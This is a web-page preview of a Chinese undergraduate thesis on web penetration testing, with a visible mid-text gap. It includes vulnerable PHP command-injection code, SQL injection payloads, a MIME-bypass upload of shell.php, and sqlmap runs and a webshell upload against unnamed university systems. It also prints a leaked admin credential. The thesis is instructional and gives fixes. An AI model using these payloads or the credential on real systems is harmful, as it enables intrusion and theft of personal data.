web安全滲透測試技術(shù)實(shí)踐_第1頁
web安全滲透測試技術(shù)實(shí)踐_第2頁
web安全滲透測試技術(shù)實(shí)踐_第3頁
web安全滲透測試技術(shù)實(shí)踐_第4頁
web安全滲透測試技術(shù)實(shí)踐_第5頁
已閱讀5頁,還剩53頁未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡介

1、院 系 學(xué)生學(xué)號 編 號 本科畢業(yè)設(shè)計(jì)題目 web安全滲透測試技術(shù)實(shí)踐 學(xué)生姓名 cui0x01 專業(yè)名稱 指導(dǎo)教師 2017年5月6日請瀏覽后下載,資料供參考,期待您的好評與關(guān)注!WEB安全滲透測試技術(shù)實(shí)踐摘要:隨著互聯(lián)網(wǎng)產(chǎn)業(yè)的高速發(fā)展,互聯(lián)網(wǎng)對人們生活的改變越來越大,人們在購物時(shí)可以使用電子支付,政府在辦公時(shí)可以使用電子政務(wù)系統(tǒng),大家在學(xué)習(xí)的時(shí)候可以看優(yōu)質(zhì)的網(wǎng)絡(luò)課程,當(dāng)然互聯(lián)網(wǎng)給人們帶來的便利不僅如此,現(xiàn)在,整個(gè)傳統(tǒng)行業(yè)都在網(wǎng)互聯(lián)網(wǎng)+靠近,誠然,互聯(lián)網(wǎng)給傳統(tǒng)行業(yè)添加了活力。但網(wǎng)絡(luò)是把雙刃劍,在給人們帶來方便的同時(shí)也會帶來一些不利的影響,比如說網(wǎng)絡(luò)信息問題,一些不法分子通過入侵網(wǎng)絡(luò)上的web

2、應(yīng)用系統(tǒng),對個(gè)人造成信息泄露,對企業(yè)造成商業(yè)機(jī)密泄露導(dǎo)致財(cái)產(chǎn)損失,對國家造成安全威脅。近幾年國家高度重視網(wǎng)絡(luò)安全,打擊網(wǎng)絡(luò)犯罪,此片文章介紹了web的組成和常見web漏洞原理,提高企業(yè)和個(gè)人警惕性,讓企業(yè)個(gè)人更好保護(hù)自己的財(cái)產(chǎn)和隱私,身為每位公民維護(hù)網(wǎng)絡(luò)世界的純凈和平每個(gè)人應(yīng)盡的義務(wù)和責(zé)任。關(guān)鍵詞:web安全;網(wǎng)絡(luò)安全;滲透測試Web security penetration testing technology practiceAbstract:With the rapid development of Internet, the Internet changes to peoples li

3、ves more and more big, people can use electronic payment when shopping, the government can use the electronic government affairs system in the office, you can see when learning quality of network curriculum, of course, the Internet bring convenience to people not only that, but now, the traditional

4、industries in net Internet + near, admittedly, the Internet to the traditional industry has added vitality. But the network is a double-edged sword, in the network brings us convenience and at the same time, some criminals through the invasion of web application system on the network, for personal i

5、nformation, commercial secrets to the enterprise has resulted in property damage, damage to national security threats. Country attaches great importance to the network security in recent years, crack down on Internet crime, this article introduces the composition of the web, and common web vulnerabi

6、lity principle, improve the enterprise and individual vigilance, make enterprise people better protect the privacy of their own property and as each citizen to maintain the network world of purity and peace everyones duty and responsibility.Key words: Web Security; network security; penetration test

7、ing目錄1緒論(1)1.1研究背景及意義(1)1.2WEB安全現(xiàn)狀(2)1.3本文結(jié)構(gòu)(3)2 WEB滲透測試?yán)碚摶A(chǔ)(3)2.1 WEB應(yīng)用組成(3)2.1.1客戶端(3)2.1.2服務(wù)端及數(shù)據(jù)庫(4)2.1.3WEB服務(wù)器軟件及操作系統(tǒng)(5)2.2HTTP協(xié)議簡介(6)2.3WEB應(yīng)用常見漏洞分析(8)2.3.1代碼執(zhí)行和命令注入(8)2.3.2SQL注入攻擊(11)2.3.3文件上傳(13)2.3.4邏輯漏洞(19)3 WEB滲透測試常用工具(22)3.1 Firefox火狐瀏覽器(22)3.2AWVS 網(wǎng)站掃描器(23)3.3NMAP 掃描利器(24)3.4Burpsuit 抓包利器

8、(24)3.5SQLMAP SQL漏洞利用神器(29)3.6Hydra爆破利器(31)4 WEB滲透測試步驟設(shè)計(jì)(31)4.1信息搜集(31)4.1.1域名信息查詢(31)4.1.2查詢WEB服務(wù)器軟件和服務(wù)端腳本語言(32)4.1.3操作系統(tǒng)指紋和開放端口掃描(33)4.1.4CMS模板識別和網(wǎng)站目錄結(jié)構(gòu)(35)4.1.5旁站信息搜集(36)4.2漏洞挖掘?qū)崙?zhàn)(37)4.2.1某高校圖書管理系統(tǒng)存在注入(37)4.2.2某高校網(wǎng)站存在上傳漏洞(39)4.2.3某高校網(wǎng)站存在敏感文件泄露(41)4.2.4某高校網(wǎng)認(rèn)證服務(wù)器存在445端口漏洞(42)4.3后滲透階段(44)4.4滲透測試報(bào)告的撰

9、寫要求(44)5總結(jié)(46)參考文獻(xiàn)(47)謝辭(48)附錄(49)附錄1web安全腦圖(49)附錄2常見web漏洞代碼(50)1緒論1.1研究背景及意義隨著互聯(lián)網(wǎng)的發(fā)展,互聯(lián)網(wǎng)+給各行業(yè)帶來新的升級的同時(shí),傳統(tǒng)行業(yè)的業(yè)務(wù)在往向互聯(lián)網(wǎng)上進(jìn)行遷移【2】。隨著web應(yīng)用的普及,個(gè)人,企業(yè)及政府都有自己的web系統(tǒng),同時(shí)電子商務(wù),電子政務(wù),電子支付等信息化的產(chǎn)物為大家?guī)矸浅4蟮谋憷5彩露际怯欣斜椎?,在信息化帶來便利的同時(shí),也存在潛在威脅,一些不法分子通過攻擊web應(yīng)用獲取非法利益,大量個(gè)人信息泄露,通過泄露的個(gè)人信息登錄支付寶,或銀行卡造成財(cái)產(chǎn)損失。企業(yè)的商業(yè)信息被盜走賣到競爭對手手上,造成

10、企業(yè)專利財(cái)產(chǎn)等損失。國家的機(jī)密文件泄露,會給國家造成不可估量的損失,嚴(yán)重危害國家安全。下表1.1列舉近年來影響較大的安全事件。 表1.1 安全事件事件造成影響“棱鏡門”事件斯諾登曝光的美國的監(jiān)控計(jì)劃3,對世界信息安全敲響警鐘。OpenSSL“心臟出血”2014年最知名的安全漏洞“心臟出血”,黑客利用該漏洞可獲取全球近三成以https開頭網(wǎng)址的用戶登錄帳號4。12306 數(shù)據(jù)泄露事件入侵者通過“撞庫”入侵,超過 13 萬條用戶數(shù)據(jù)被泄露出去,對個(gè)人出行造成不便。圓通泄露客戶百萬信息商業(yè)信不嚴(yán)重不安全,快遞行業(yè)信息泄密愈演愈烈。中國人壽近百萬份保單信息泄露保單包含個(gè)人資料全面,泄露這些資料非常危險(xiǎn)

11、。.WEB滲透測試通過站在入侵者的立場,盡可能完整的發(fā)動技術(shù)攻擊和手段對目標(biāo)應(yīng)用安全性做深入測試,發(fā)現(xiàn)目標(biāo)系統(tǒng)的最脆弱環(huán)節(jié),能夠讓用戶直觀的看到當(dāng)前應(yīng)用的脆弱性、可能造成的影響、以及采取必要的防護(hù)措施。1.2WEB安全現(xiàn)狀WEB安全作為網(wǎng)絡(luò)安全分支之一,近幾年來Web系統(tǒng)遭到入侵攻擊,數(shù)據(jù)泄密,頁面被篡改數(shù)量巨大。這些被盜數(shù)據(jù)或者機(jī)密文件對個(gè)人企業(yè)或者國家機(jī)構(gòu)造成很大的損失。由于近些幾年國家重視網(wǎng)絡(luò)安全,并且頒布相關(guān)法律,很少有學(xué)校開相關(guān)課程,web安全工程師挺缺人,很多互聯(lián)網(wǎng)公司保護(hù)自己公司財(cái)產(chǎn),自己都設(shè)有SRC(應(yīng)急響應(yīng)中心),在人員招聘上重金難聘,足以說明目前web安全是一個(gè)很大缺口的市

12、場,在未來的物聯(lián)網(wǎng)世界,物聯(lián)網(wǎng)安全很有前景。應(yīng)用漏洞的研究組織OWASP組織在2013年發(fā)布了web應(yīng)用前10大風(fēng)險(xiǎn)漏洞OWASP TOP10【10】,例舉了2010-2013年期間針對web攻擊頻率最高的十大攻擊方法。表1.2 OWASP TOP 10-2013序號漏洞名稱A1注入A2失效的身份認(rèn)證和會話管理A3跨站腳本(XSS)A4不安全的直接對象引用A5安全配置錯(cuò)誤A6敏感信息泄漏A7功能級訪問控制缺失A8跨站請求偽造 (CSRF)A9使用含有已知漏洞的組件A10未驗(yàn)證的重定向和轉(zhuǎn)發(fā)目前隨著國家高度重視網(wǎng)絡(luò)安全,在此巨大市場缺口的下,國內(nèi)安全公司如雨后春筍般拔地而起,原先一些攻擊者懼于現(xiàn)

13、在的網(wǎng)絡(luò)安全法,現(xiàn)在已經(jīng)洗白從事安全維護(hù)工作,壯大了安全公司,隨著這個(gè)行業(yè)被認(rèn)可,商業(yè)化市場缺口推動著安全公司對技術(shù)的追求。這里列舉了一些國內(nèi)常見的安全廠商和產(chǎn)品。表1.3 國內(nèi)常見安全廠商和產(chǎn)品廠商名稱產(chǎn)品名稱360360主機(jī)衛(wèi)士知道創(chuàng)宇樂安全安全狗安全狗主機(jī)衛(wèi)士綠盟科技Web應(yīng)用防火墻深信服下一代防火墻啟明星辰WAF100001.3本文結(jié)構(gòu)第一章是緒論說明了對滲透技術(shù)實(shí)踐的背景和意義,以及目前web安全的現(xiàn)狀。第二章是對web組成結(jié)構(gòu)的了解,先知道是什么東西,其次再對web方面的常見漏洞原理分析。第三章古人說工欲善其事必先利其器,這張介紹了一些輔助工具,再手工滲透的時(shí)候借助工具可以提高效率

14、。第四章是完整的web滲透流程,將零碎的知識串起來,從而達(dá)到一個(gè)層次的提升。第五章是一個(gè)實(shí)踐的項(xiàng)目,實(shí)踐是查驗(yàn)理論的獨(dú)一標(biāo)準(zhǔn),通過實(shí)踐,可以大大提高自身的技術(shù)和興趣。2 web滲透測試?yán)碚摶A(chǔ)2.1 web應(yīng)用組成2.1.1客戶端HTML語言簡介HTML是這幾個(gè)(Hyper Text Mark-up Language )英文首字母大寫的縮寫,用中文翻譯過來就是文本標(biāo)記語言,通常我們所說上網(wǎng)沖浪中“沖浪”訪問的頁面主要就是用這種語言寫的。 HTML語言通常可以表示文字、圖片、動畫片、音樂、鏈接等。其組成部分主要由head、Body組成。CSS是Cascading Style Sheet,這三個(gè)英

15、文首字母大寫的縮寫。中文翻譯為層疊樣式表。是用來增強(qiáng)網(wǎng)頁排版和網(wǎng)頁內(nèi)容優(yōu)化的一種語言。 可以這么說,HTML的標(biāo)簽是定義網(wǎng)站頁面的內(nèi)容,CSS標(biāo)簽是控制網(wǎng)站頁面的內(nèi)容如何顯示。Javascript是一種瀏覽器端的腳本的言語,可以通過瀏覽器直接執(zhí)行,廣泛用于web前段。2.1.2服務(wù)端及數(shù)據(jù)庫PHP語言簡介PHP是由Hypertext Preprocessor縮寫而得到的,中文翻譯過來“超文本處理”是一種很優(yōu)秀的服務(wù)端腳本語言。很多大型網(wǎng)站,博客系統(tǒng),購物系統(tǒng)都是用php語言編寫的,通常php+mysql+apche+liunx是非常好的組合。ASP/ASP.NET語言簡介ASP(ActiveS

16、erverPages),其實(shí)是一套微軟開發(fā)的服務(wù)器端腳本環(huán)境,是創(chuàng)建動態(tài)網(wǎng)頁的一個(gè)很好的工具【5】,ASP.NET是ASP的升級版,不過ASP.NET比ASP更加優(yōu)秀,ASP.NET具有網(wǎng)站開發(fā)的解決方案,包括驗(yàn)證身份,緩存網(wǎng)頁等。其部署和調(diào)試非常簡單,通常和微軟出的web容器IIS在數(shù)據(jù)庫sql server搭配較好。JSP語言簡介JSP是sun公司開發(fā)的一種動態(tài)網(wǎng)頁技術(shù),JSP是跨平臺的,他做出的應(yīng)用可以分別在類unix和win平臺上跑起來。JSP的全稱是Java Server Pages,是由HTML代碼和嵌入到其中的JAVA代碼組成的。MYSQL/SQL SERVER/ORCLE這三個(gè)

17、都是關(guān)系型數(shù)據(jù)庫,其中MYSQL為開源的數(shù)據(jù)庫,SQL SERVER是微軟研發(fā)出來的數(shù)據(jù)庫,ORCLE為甲骨文公司的數(shù)據(jù)庫。他們都是存儲數(shù)據(jù)的倉庫,都可以建立數(shù)據(jù)庫,數(shù)據(jù)庫里面建立數(shù)據(jù)表,數(shù)據(jù)表里面有行和列,有不同的權(quán)限,可以操縱的數(shù)據(jù)庫不一樣。2.1.3web服務(wù)器軟件及操作系統(tǒng)iiS 的全稱是Internet Information Services,中文翻譯為互聯(lián)網(wǎng)信息服務(wù),主要是提供web服務(wù),用于放置ASP,ASP.NET語言編寫的腳本,為用戶提供網(wǎng)上沖浪服務(wù),網(wǎng)上學(xué)習(xí),購物等。目前最新的版本是IIS8,IIS5和IIs6都有相應(yīng)的文件漏洞,配合文件上傳漏洞,對web安全的危害大,可

18、導(dǎo)致直接拿下web站點(diǎn),進(jìn)一步提權(quán)入侵操作系統(tǒng),從而滲透到內(nèi)網(wǎng)。漏洞出現(xiàn)后微軟官方也出過相關(guān)補(bǔ)丁,建議升級最新的IIS組件。APCHEApacheHTTPServer(簡稱Apache)是Apache軟件基金會的一個(gè)開放源代碼的網(wǎng)頁服務(wù)器,可以在大多數(shù)電腦操作系統(tǒng)中運(yùn)行,由于其跨平臺和安全性被廣泛使用【6】。NGINX屬于一款輕型web服務(wù)器軟件,占用內(nèi)存較小,性能較好,中國許多廠商都使用使用nginx的站點(diǎn)有:百度()、京東()、新浪()、騰訊()、淘寶()等。WINDOWS

19、類服務(wù)器操作系統(tǒng)Windows服務(wù)器是微軟公司研發(fā)出來的一款操作系統(tǒng),服務(wù)器和我們平時(shí)用的windows操作系統(tǒng)差不多一樣,只是在某些服務(wù)功能上比普通的操作系統(tǒng)好點(diǎn),在硬件資源上需要用的資源用以提供各種服務(wù)。LINUX類操作系統(tǒng)也是操作系統(tǒng)的一種,它的最大的優(yōu)點(diǎn)就是提供源代碼開放,可以使用很多免費(fèi)開源軟件。大多數(shù)web容器都會部署在linux上面,因?yàn)閘iunx操作系統(tǒng)穩(wěn)定安全,占用硬件資源較小,企業(yè)用來花費(fèi)少,在此基礎(chǔ)上衍生出很多成功版本如redhat,ubuntu,centos非常成功。2.2HTTP協(xié)議簡介圖1 http請求和發(fā)送HTTP協(xié)議說明HTTP是由HyperText Trans

20、fer Protocol這三個(gè)英文首字母大寫縮寫而得到的,這個(gè)協(xié)議是負(fù)責(zé)web客戶端和服務(wù)端通信,一般版本是1.0,由美國人Ted Nelson發(fā)明的,他想發(fā)明一種處理計(jì)算機(jī)文本的方法,為HTTP協(xié)議發(fā)展奠定了基礎(chǔ)。HTTP請求結(jié)構(gòu)圖2 HTTP請求結(jié)構(gòu)圖 一個(gè)請求由四個(gè)部分組成:請求行、請求頭標(biāo)、空行和請求數(shù)據(jù)1.請求行:是由請求方法、請求URI和HTTP版本組成。例如:GET /index.html HTTP/1.1HTTP協(xié)議規(guī)定了8種請求的協(xié)議:GET請求是一個(gè)簡單的請求方法;HEAD請求是與GET方法類似,服務(wù)器那邊只返回狀態(tài)行和頭標(biāo),不返回所要請求的文檔;POST請求向服務(wù)器傳送數(shù)

21、據(jù)流;PUT請求是服務(wù)器保存請求數(shù)據(jù)作為指定URI新內(nèi)容的請求;DELETE請求服務(wù)器請求刪除URI中命名的1資源請求的一種方式;OPTIONS請求是關(guān)于服務(wù)器支持的請求方法信息的請求;TRACE請求是Web服務(wù)器反饋Http請求和其頭標(biāo)的請求;CONNECT請求是已文檔化但當(dāng)前未實(shí)現(xiàn)的一個(gè)方法,預(yù)留做隧道處理。2.請求頭標(biāo):由關(guān)鍵字和值對應(yīng)組成,每行一對,關(guān)鍵字和關(guān)鍵值之間用冒號分里開,請求頭標(biāo)通知服務(wù)器有關(guān)于客戶端的功能和標(biāo)識,典型的請求頭標(biāo)有【7】:User-Agent是客戶端瀏覽器的標(biāo)識;Accept是客戶端可識別的內(nèi)容類型列表;Content-Length是附加到請求的數(shù)據(jù)字節(jié)數(shù)。3

22、. 空行:最后一個(gè)響應(yīng)頭標(biāo)之后是一個(gè)空行,發(fā)送回車符和退行,表明服務(wù)器以下不再有頭標(biāo)【8】。 4.請求數(shù)據(jù):通過POST傳送數(shù)據(jù),經(jīng)常使用的是Content-Length和Content-Type頭標(biāo)這兩種標(biāo)識。HTTP響應(yīng)結(jié)構(gòu)如下圖所示:圖3 HTTP響應(yīng)頭一個(gè)響應(yīng)由四個(gè)部分組成;狀態(tài)行、響應(yīng)頭標(biāo)、空行、響應(yīng)數(shù)據(jù)1. 狀態(tài)行:響應(yīng)代碼和響應(yīng)描述和HTTP版本這三個(gè)標(biāo)記組成。HTTP版本:通告客戶端服務(wù)端能是別的版本。響應(yīng)代碼是3位的數(shù)字代碼,用來指示請求狀態(tài)(成功或者失?。豁憫?yīng)描述是解釋響應(yīng)代碼。例如:HTTP/1.1 200 OK:HTTP響應(yīng)碼由1xx:信息,收到請求,表示繼續(xù)處理;2

23、xx:成功,表示請求成功;3xx:重定向,重新修改請求的url;4xx:客戶端出現(xiàn)錯(cuò)誤。2.響應(yīng)頭標(biāo)是類似與請求頭標(biāo),里面包含服務(wù)的相關(guān)信息。3.空行是表明服務(wù)器以下不再有頭標(biāo),最后一個(gè)響應(yīng)頭標(biāo)之后是一個(gè)空行,發(fā)送回車符和退行。4.響應(yīng)數(shù)據(jù)是html文檔相關(guān)的東西,本身需要接收的數(shù)據(jù)。2.3web應(yīng)用常見漏洞分析2.3.1代碼執(zhí)行和命令注入代碼執(zhí)行,就是在web服務(wù)軟件中任意執(zhí)行惡意破壞的代碼。命令注入,就是在可以在服務(wù)端執(zhí)行操作惡意系統(tǒng)的命令。這兩種情況都是由于代碼/命令過濾不嚴(yán)謹(jǐn)所致。代碼執(zhí)行漏洞服務(wù)端的代碼演示。 攻擊者可以通過如下Payload實(shí)施代碼注入:/dmzx.php?arg=

24、1;phpinfo() 圖4 代碼執(zhí)行演示命令注入的源代碼展示PHP語言提供了一些用來執(zhí)行外部應(yīng)用程序的函數(shù),例如:exec()system(),passthru(),和shell_exec()等函數(shù)。 ?phpif( isset( $_POST submit ) ) $target = $_REQUEST ip ; / Determine OS and execute the ping command. if (stristr(php_uname(s), Windows NT) $cmd = shell_exec( ping . $target ); echo .$cmd.; else $c

25、md = shell_exec( ping -c 3 . $target ); echo .$cmd.; ? 這段代碼中并未對ip這個(gè)參數(shù)進(jìn)行過濾,導(dǎo)致再輸入時(shí)可以輸入多個(gè)命令。圖5 命令注入1圖6命令注入2代碼執(zhí)行和命令注入防范思路。盡量不要使用系統(tǒng)命令執(zhí)行,在進(jìn)入執(zhí)行命令函數(shù)之前,變量一定要做好過濾,對敏感字符進(jìn)行轉(zhuǎn)義,在使用動態(tài)函數(shù)之前,確保使用的函數(shù)是指定函數(shù)之一,對php語言來說,不能完全控制的危險(xiǎn)函數(shù)最好不要使用。2.3.2SQL注入攻擊SQL注入漏洞是一種常見的web安全漏洞,它的本質(zhì)原因是在和數(shù)據(jù)庫交互數(shù)據(jù)的時(shí)候,編程人員寫的代碼過濾不嚴(yán)謹(jǐn),攻擊者經(jīng)常利用這個(gè)問題,可以訪問或修

26、改數(shù)據(jù),或者利用潛在的數(shù)據(jù)庫漏洞進(jìn)行攻擊。SQL注入類型可分為3種,數(shù)字型注入,搜索型注入,字符型注入。數(shù)字型注入:/news.php?id=1 and 1=1; select * from news where id=1 and 1=1 字符型注入:/news.php?chr=name; select * from news where chr=name; select * from news where chr=name and 1=1 搜索型注入:/news.php?search=測試; select * from new

27、s where search like % 漢字 % ; select * from news where search like %漢字 % and %1%=%1%判斷注入點(diǎn)判斷條件:第一必須有參數(shù),第二必須要有帶入數(shù)據(jù)庫查詢。例如:/papers.asp?id=1 可能存在注入。進(jìn)一步通過邏輯注入語句進(jìn)行判定結(jié)果,一定要用邏輯判斷。/papers.asp?id=1 and 1=1 執(zhí)行語句select * from papers where id=1 and 2=2頁面返回顯示正常。/news.asp?id=1 and 1=

28、2; 執(zhí)行語句select * from papers where id=1 and 1=2頁面返回顯示不正常。圖7 正常頁面對比不正常頁面php+mysql手工注入演示( union select user(),database() #)圖8 注入演示1php+mysql手工注入演示( union select 1,2 #)圖9 注入演示2php+mysql手工注入演示( union select user,password from users #)圖10 注入演示32.3.3文件上傳 上傳檢測流程概述 圖11 上傳演示1文件上傳檢測方法通常一個(gè)文件以HTTP協(xié)議進(jìn)行上傳時(shí),將以POST請

29、求發(fā)送至web服務(wù)器,web服務(wù)器接收到請求并同意后,用戶與web服務(wù)器將建立連接,并傳輸dafa【9】。通常在文件上傳過程中會檢測下面紅顏色標(biāo)出來的代碼。圖12 上傳演示2A 客戶端對前端語言javascript 檢測(通常為檢測需要上傳的文件擴(kuò)展名)B 服務(wù)端對所上傳文件的MIME 類型檢測(檢測Content-Type 內(nèi)容)C 服務(wù)端對所上傳文件的目錄路徑檢測(檢測跟path 參數(shù)相關(guān)的內(nèi)容)D 服務(wù)端對所上傳文件的文件擴(kuò)展名檢測(檢測跟文件extension 相關(guān)的內(nèi)容)E 服務(wù)端對所上傳文件的文件內(nèi)容檢測(檢測內(nèi)容是否合法或含有惡意代碼)客戶端檢測繞過(javascript 檢測)

30、圖13 上傳演示3客戶端檢測主要是通過前端javascript腳本檢測文件的后綴是否為允許的格式。服務(wù)端檢測繞過(MIME 類型檢測)圖14 上傳演示4假如服務(wù)器端上的upload.php 代碼如下然后我們可以將request 包的Content-Type 修改POST /upload.php HTTP/1.1TE: deflate,gzip;q=0.3Connection: TE, closeHost: localhostUser-Agent: libwww-perl/5.803Content-Type: multipart/form-data; boundary=xYzZYContent-

31、Length: 155-xYzZYContent-Disposition: form-data; name=userfile; filename=shell.phpContent-Type: image/gif (原為Content-Type: text/plain)-sSxYzZY-收到服務(wù)器端返回來的應(yīng)答HTTP/1.1 200 OKDate: Thu, 31 May 2011 14:02:11 GMTServer: Apache2.3Content-Length: 59Connection: closeContent-Type: text/htmlFile is valid, and w

32、as successfully uploaded.可以看到我們成功繞過了服務(wù)端MIME 類型檢測。像這種服務(wù)端檢測http 包的Content-Type 都可以用這種類似的方法來繞過檢測。圖15 上傳演示5服務(wù)器檢測繞過(目錄路徑檢測)圖16 上傳演示6目錄路徑檢測,一般就是檢測上傳的路徑是否合法,稍微有一些特殊一點(diǎn)的都沒有防御。比如比較新的fckeditor php python27 sqlmap.py -r F:toolssqlmap-1.0.7bb.txt -p txtName -threads 1 -level 2 -risk 3 -random-agent -hex -v 3 SQL

33、MAP顯示操作系統(tǒng)為win2003或者XP,數(shù)據(jù)庫為ORACLE。圖47 確定注入漏洞最后從數(shù)據(jù)庫顯示來看涉及近2萬多條學(xué)生的登陸賬號密碼,姓名專業(yè)及身份證號等。C:UsersAdminpython27 sqlmap.py -r F:toolssqlmap-1.0.7bb.txt -p txtName -threads 1 -level 2 -risk 3 -random-agent -hex -v 3 -D ILAS -tables -count圖48 泄露信息內(nèi)容抽樣針對這個(gè)SQL注入漏洞,在登錄框服務(wù)端接收數(shù)據(jù)時(shí)對特殊字符例如單引號、雙引號等進(jìn)行轉(zhuǎn)義。4.2.2某高校網(wǎng)站存在上傳漏洞一般

34、情況下,直接上傳漏洞還是很難找見的,配合目錄遍歷,可以嘗試找特殊頁面上傳文件。通過目錄遍歷發(fā)現(xiàn)該網(wǎng)站后臺地址。域名/WebSystems/login.php圖 49上傳演示1有開始對后臺目錄進(jìn)行遍歷發(fā)現(xiàn),域名WebSystems/install.php,該頁面泄露敏感信息。圖50 上傳演示2直接上傳webshell用菜刀連接。圖51上傳演示3菜刀連接webshell后服務(wù)器上的文件可以自行下載上傳,危害巨大。圖52 getshell針對這個(gè)問題,這些目錄中包含了敏感內(nèi)容,請刪除這些目錄,或者正確設(shè)置權(quán)限,禁止用戶訪問。4.2.3某高校網(wǎng)站存在敏感文件泄露網(wǎng)站敏感信息泄露,也是個(gè)危害很大的問題,有時(shí)嚴(yán)重泄露管理員賬號密碼。發(fā)現(xiàn)泄露數(shù)據(jù)庫頁面。圖53 信息泄露演示1查看數(shù)據(jù)庫語言看出管理員賬號密碼。圖54 信息泄露演示2通過解密MD5值得出來后臺賬號和密碼分別為admin #hqsy$hqsy 登錄進(jìn)入后臺,控制后臺之后可以隨意發(fā)文章等。圖55 登錄后臺針對此問題,加強(qiáng)對網(wǎng)站目錄權(quán)限加管理,禁止非法訪問,在服務(wù)端接收http協(xié)議中校驗(yàn)x-forword是否來源于登錄頁面。4.2.4某高校網(wǎng)認(rèn)證服務(wù)器存在445端口漏洞通過泄露的NSA武

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

最新文檔

評論

0/150

提交評論